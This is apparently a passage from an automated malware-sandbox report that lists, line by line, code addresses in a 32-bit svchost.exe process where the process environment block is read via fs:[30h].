            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B63C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035663FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03528397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03528397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03528397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0355438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0355438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352A250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03536259 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035EA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035EA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B8243 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B8243 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03534260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03534260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03534260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352826B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0360625D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352823B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035402E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035402E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035402E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036062D6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B0283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B0283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B0283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035402A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035402A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C62A0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352C156 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C8158 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03604164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03604164 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03536154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03536154 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C4144 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DA118 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DA118 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035F0115 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03560124 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036061E5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035F61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035F61C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035601F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B019F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352A197 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03570185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035EC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035EC188 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D4180 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03532050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B6050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0355C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B4000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C6030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B20DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035720F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035380E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B60E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035F60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035F60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035280A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C80A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03530750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BE75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03572750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03538770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03530710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03560710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035AC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B07C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035347FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035527ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035BE7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D678E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035307AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E47A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0354C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03562674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035F866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035F866E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A660 mov eax, dword ptr fs:[00000030h]1_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A660 mov eax, dword ptr fs:[00000030h]1_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572619 mov eax, dword ptr fs:[00000030h]1_2_03572619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE609 mov eax, dword ptr fs:[00000030h]1_2_035AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354260B mov eax, dword ptr fs:[00000030h]1_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E627 mov eax, dword ptr fs:[00000030h]1_2_0354E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03566620 mov eax, dword ptr fs:[00000030h]1_2_03566620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03568620 mov eax, dword ptr fs:[00000030h]1_2_03568620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353262C mov eax, dword ptr fs:[00000030h]1_2_0353262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A6C7 mov eax, dword ptr fs:[00000030h]1_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h]1_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h]1_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h]1_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE6F2 mov eax, dword ptr fs:[00000030h]1_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B06F1 mov eax, dword ptr fs:[00000030h]1_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B06F1 mov eax, dword ptr fs:[00000030h]1_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534690 mov eax, dword ptr fs:[00000030h]1_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03534690 mov eax, dword ptr fs:[00000030h]1_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035666B0 mov eax, dword ptr fs:[00000030h]1_2_035666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C6A6 mov eax, dword ptr fs:[00000030h]1_2_0356C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538550 mov eax, dword ptr fs:[00000030h]1_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538550 mov eax, dword ptr fs:[00000030h]1_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356656A mov eax, dword ptr fs:[00000030h]1_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356656A mov eax, dword ptr fs:[00000030h]1_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356656A mov eax, dword ptr fs:[00000030h]1_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6500 mov eax, dword ptr fs:[00000030h]1_2_035C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03604500 mov eax, dword ptr fs:[00000030h]1_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540535 mov eax, dword ptr fs:[00000030h]1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355E53E mov eax, dword ptr fs:[00000030h]1_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035365D0 mov eax, dword ptr fs:[00000030h]1_2_035365D0
